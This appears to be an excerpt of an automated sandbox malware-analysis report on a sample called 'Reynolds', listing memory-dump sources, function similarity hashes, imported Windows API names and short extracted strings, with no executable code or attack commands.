                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: f$p
                                                                                                      • API String ID: 3215553584-1290815066
                                                                                                      • Opcode ID: 14ccad43d37fd71aaa8e031f26cd0cf571f1f2d22f7e2fca84e2043b4fd9c4d9
                                                                                                      • Instruction ID: 4f8be7e143e6660ed587b896e8588123623352b7d1a2c328767a91f3d71ef431
                                                                                                      • Opcode Fuzzy Hash: 14ccad43d37fd71aaa8e031f26cd0cf571f1f2d22f7e2fca84e2043b4fd9c4d9
                                                                                                      • Instruction Fuzzy Hash: D7122722E0E153E5FB22BB14F004279FA75EB50754FC94279D69C07AE8DB3DE5828B20
                                                                                                      APIs
                                                                                                      • #8.OLEAUT32(?,?,?,?,?,?,?,00007FF7AA15B677,?,?,?,?,?,?,00000000,00007FF7AA1883FD), ref: 00007FF7AA15B329
                                                                                                      • #9.WSOCK32(?,?,?,?,?,?,?,00007FF7AA15B677,?,?,?,?,?,?,00000000,00007FF7AA1883FD), ref: 00007FF7AA15B3AE
                                                                                                      • #10.WSOCK32(?,?,?,?,?,?,?,00007FF7AA15B677,?,?,?,?,?,?,00000000,00007FF7AA1883FD), ref: 00007FF7AA15B3BA
                                                                                                      • #9.WSOCK32(?,?,?,?,?,?,?,00007FF7AA15B677,?,?,?,?,?,?,00000000,00007FF7AA1883FD), ref: 00007FF7AA15B3C5
                                                                                                      • #2.WSOCK32(?,?,?,?,?,?,?,00007FF7AA15B677,?,?,?,?,?,?,00000000,00007FF7AA1883FD), ref: 00007FF7AA15B3F5
                                                                                                      • #10.WSOCK32(?,?,?,?,?,?,?,00007FF7AA15B677,?,?,?,?,?,?,00000000,00007FF7AA1883FD), ref: 00007FF7AA15B457
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
                                                                                                      • Instruction ID: 767c18689da8dfb8cbe4ad1465a1b308a2573f79c98da3cd221fc0ef75fee82a
                                                                                                      • Opcode Fuzzy Hash: 785b3640f85267f1ef9f05d197945c1451001bbbcd8b86362fb934929ab386fd
                                                                                                      • Instruction Fuzzy Hash: B9714E31A1E243E2FE2ABF29E19407CA371EF45780F864175D64A077B1EE2CE9568720
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                      • API String ID: 0-2263619337
                                                                                                      • Opcode ID: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
                                                                                                      • Instruction ID: dbb5be826cb3d5916e2cb38a05499e6253111ae792f3d6c6189f43731c0f7c55
                                                                                                      • Opcode Fuzzy Hash: 10a07b77c3d4b654f9d55339737c030c9922b14c4774005ba61325eac3fbb13f
                                                                                                      • Instruction Fuzzy Hash: 9051D672F0AA02D6FB12EB68E0401BDB375EB81B84F968175DA0E077A5DE39D543C350
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$___mb_cur_max_funcfreemallocwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2983283001-0
                                                                                                      • Opcode ID: 310b7c8f0d1ffc8152b8f5f88d34d6eeceacff066d323edff3efd4d90646da0a
                                                                                                      • Instruction ID: 7c53e4e8e19077f3cc9bea3e26bcf54620a64f4b2ee73879660b848f41ecee62
                                                                                                      • Opcode Fuzzy Hash: 310b7c8f0d1ffc8152b8f5f88d34d6eeceacff066d323edff3efd4d90646da0a
                                                                                                      • Instruction Fuzzy Hash: F941E223218AA087E326DF65A41836EBFA0F795BC4F448165EEC603BD6EE79C4C5C740
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                      • String ID:
                                                                                                      • API String ID: 2592858361-0
                                                                                                      • Opcode ID: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
                                                                                                      • Instruction ID: a334c045e53bc72b1c75d1c2594f9fedc54e01ea36f9e3721b0b4f2f72bf80b7
                                                                                                      • Opcode Fuzzy Hash: c0ed2a69acb1fa65bc09f52d169f3783c288c6979980f6a8e8ea6be4c03c785a
                                                                                                      • Instruction Fuzzy Hash: D4519B72A0A682D6F621EB11E48437AB7B0FB55B94F820175CA5D07BA5EF7DE402C720
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2082702847-0
                                                                                                      • Opcode ID: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
                                                                                                      • Instruction ID: 5138de2ad193fa22c477b26d322844f0e6d966c7445a6bb0cc2b9d8bc5c63f71
                                                                                                      • Opcode Fuzzy Hash: 14857e1ad4c4825aa7d047bb9807a31f284bfb654c1297a130cb15933308218e
                                                                                                      • Instruction Fuzzy Hash: D1213C75A0B646E1FE16EB61F408279A2B0AF447B4F960774DA2D066E5DE3CE40A8320
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 450394209-0
                                                                                                      • Opcode ID: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
                                                                                                      • Instruction ID: fb33bad28bcccfd6f04924ca04e8bf89d9dd329a3e7e8cd58669992d0483d759
                                                                                                      • Opcode Fuzzy Hash: c3e3764820b3f5600a73afc0a99e1e7d3feceb6c0e9b2fc54303b0e2514af5be
                                                                                                      • Instruction Fuzzy Hash: 4D119036B0D682D7FB55AB15F44032AA3B1AB84B88F994070DA4D4BA28DF3DD4828B10
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                                      • String ID:
                                                                                                      • API String ID: 3326252324-0
                                                                                                      • Opcode ID: 046c686a04437311f08e48af213c3933ddadf9326a8618350c892433254c2136
                                                                                                      • Instruction ID: e763b80d5e7b0abef8a323fe110f95e1c4eef307f8dc3a886e5c54c3267412c1
                                                                                                      • Opcode Fuzzy Hash: 046c686a04437311f08e48af213c3933ddadf9326a8618350c892433254c2136
                                                                                                      • Instruction Fuzzy Hash: 4F21CC33601E3883FA579F51FA5C3642A61B754FE0F5406D1C9DA8BAA7DF28E8C68300
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDevice$Release
                                                                                                      • String ID:
                                                                                                      • API String ID: 1035833867-0
                                                                                                      • Opcode ID: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                                                                                                      • Instruction ID: 168615ca83f69ee19ff521eb6a9728083bc0357878b3f3358de01cb0a5d160b0
                                                                                                      • Opcode Fuzzy Hash: e96038359b8bcf9d40ab16245d6c00f02c1c42b7617fe174b97500c319439ec5
                                                                                                      • Instruction Fuzzy Hash: F5119175B0AB11D2FB09DB61E444029A6B5FB88BD4B868078CE0E47B64DE3DD8028710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                      • String ID:
                                                                                                      • API String ID: 43455801-0
                                                                                                      • Opcode ID: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                                                                                                      • Instruction ID: e5ebf5a0aaa901c1181cc5a49926c81b362a812ac20364ae4d8b25486a9c530d
                                                                                                      • Opcode Fuzzy Hash: aa036b7f6b4181bf747b7f25e8c59d16cc241acf913ae98ed06744a76854e657
                                                                                                      • Instruction Fuzzy Hash: 9411BF32B19292E2F715AB15F804779A770EB85BA8F994175CF0603B60CF7DE44AC740
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4278518827-0
                                                                                                      • Opcode ID: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                                                                                                      • Instruction ID: 1ed8782babb00ef6e56afe94467e61ec9ff550546acf48e8a32e545a71196d4e
                                                                                                      • Opcode Fuzzy Hash: 7b1f2997da372a43bc31476f6d0c07695968ad033343f6aabdfa55d6cba17457
                                                                                                      • Instruction Fuzzy Hash: 4211527291A640CAE349DF39DC881197BB2FB58B18B958478C24987276DF39D49BC710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: #$E$O
                                                                                                      • API String ID: 3215553584-248080428
                                                                                                      • Opcode ID: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                                                                                                      • Instruction ID: 98c492422269c85ee0aeb6f6103e1d8876c861469ec8406493fd5fca318d9f42
                                                                                                      • Opcode Fuzzy Hash: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                                                                                                      • Instruction Fuzzy Hash: 2841A322A1A751D5FF52AB25E8402BDA3B0FF54798B894075EE4D07768EF3ED44AC320
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _errnomemset
                                                                                                      • String ID: P
                                                                                                      • API String ID: 3043901106-3110715001
                                                                                                      • Opcode ID: 4d236f57323baabecf70d0d1eca7d34f820cb77df5c0eb23e4659be4acd931ba
                                                                                                      • Instruction ID: 74d24377c2b1fbcdb99d1dece966251a074564c6676563314f4f90519c56b71c
                                                                                                      • Opcode Fuzzy Hash: 4d236f57323baabecf70d0d1eca7d34f820cb77df5c0eb23e4659be4acd931ba
                                                                                                      • Instruction Fuzzy Hash: AE51B373208AE487E7738F28E4493EABBA0F785B94F045151CFDA57A96CB38C4C58B00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$fputwc
                                                                                                      • String ID: o$o
                                                                                                      • API String ID: 3923445609-2419050592
                                                                                                      • Opcode ID: 0e953a1d3deaba2e067c36e90a26b97d2f55abf671cbae7c9199f28f6f0a85d3
                                                                                                      • Instruction ID: 115d5d2b0bcc884fc4ec135d838ee2e12fefe5ff0dee0f4643f1001d04b4a523
                                                                                                      • Opcode Fuzzy Hash: 0e953a1d3deaba2e067c36e90a26b97d2f55abf671cbae7c9199f28f6f0a85d3
                                                                                                      • Instruction Fuzzy Hash: 3041C363A08AB147F77B8E3A925C36A7E92A715BE4F109150CFE766AD3D235D8D1C300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                      • String ID: Line %d: $AutoIt -
                                                                                                      • API String ID: 3135491444-4094128768
                                                                                                      • Opcode ID: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                                                                                                      • Instruction ID: 8f933acc322544a284c8314785f127897646c40fdb41f3337a9075740dd06a06
                                                                                                      • Opcode Fuzzy Hash: 354254922fa2c28dd54db28c89f49ff099e9fde37b9e557e9e980069f242a2a6
                                                                                                      • Instruction Fuzzy Hash: EC415322A0E647E6F751FB20E4801BEA361FB95344FC14075E64D475BAEF2CE61AC760
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                      • String ID: SysAnimate32
                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                      • Opcode ID: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                                                                                                      • Instruction ID: c1fe1953de77a287e7e00766e0b3a47b31a4aa1a9866036b4850a6354572668d
                                                                                                      • Opcode Fuzzy Hash: 0f65093a7382f8a48a4cc55905c2204c55616e0901a85524ccd8895086e96556
                                                                                                      • Instruction Fuzzy Hash: 7C31A07260A6C1DAE761AF20E440B6EB7B1FB85790F914139DA5D07BA4DF3DD442CB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                                                                                                      • Instruction ID: 5ba608dadfd17d34861672728dc34a08a30d2d85a4c81bfd86e03a3c82efa9cd
                                                                                                      • Opcode Fuzzy Hash: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                                                                                                      • Instruction Fuzzy Hash: 4BF0A475A1AA46E1FF86AB51F440279A3B0EF88790FC51079E91F42674DE3DD446C710
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                                                                                                      • Instruction ID: 6f81d1b64fd35e0cba06cf2e7a6877322a4b9bf65c547b250021e2a0d4d1a995
                                                                                                      • Opcode Fuzzy Hash: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                                                                                                      • Instruction Fuzzy Hash: 40A10866E0A782E5FBAA6F50F400379A6A1EF407A4F8646B5CA1D067E5DF7CD4068330
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
